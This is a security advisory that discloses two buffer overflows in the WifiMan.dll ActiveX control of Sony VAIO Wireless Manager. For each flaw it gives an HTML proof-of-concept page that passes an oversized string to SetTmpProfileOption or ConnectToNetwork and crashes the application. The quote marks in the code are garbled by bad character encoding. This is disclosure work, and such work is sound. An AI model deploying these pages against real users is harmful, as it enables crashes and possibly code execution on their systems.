High-Tech Bridge SA Security Research Lab has discovered 2 buffer overflow vulnerabilities in Wireless Manager Sony VAIO which can be exploited to execute arbitrary code on vulnerable system.
1.1 The method SetTmpProfileOption() in WifiMan.dll library does not properly check the length of string parameters.
An attacker could craft a malicious HTML page to trigger the vulnerability and execute arbitrary code in the context of the affected user.
The following PoC will crash the application:
<HTML>
<BODY>
<object id=ctrl
classid=βclsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}β></object>
< SCRIPT>
function Do_()
{
arg1=1
arg2=String(8212, βXβ)
arg3=βdefaultVβ
ctrl.SetTmpProfileOption arg1 ,arg2 ,arg3
}
</SCRIPT>
<input language=JavaScript onclick=Do_() type=button value=βSony_POCβ>
</BODY>
</HTML>
1.2 The method ConnectToNetwork() in WifiMan.dll library does not properly check the length of string parameters.
An attacker could craft a malicious HTML page to trigger the vulnerability and execute arbitrary code in the context of the affected user.
The following PoC will crash the application:
<HTML>
<BODY>
<object id=ctrl
classid=βclsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}β></object>
< SCRIPT>
function Do_()
{
arg1=1
arg2=String(6164, βXβ)
ctrl.ConnectToNetwork arg1 ,arg2
}
</SCRIPT>
<input language=JavaScript onclick=Do_() type=button value=βSony_POCβ>
</BODY>
</HTML>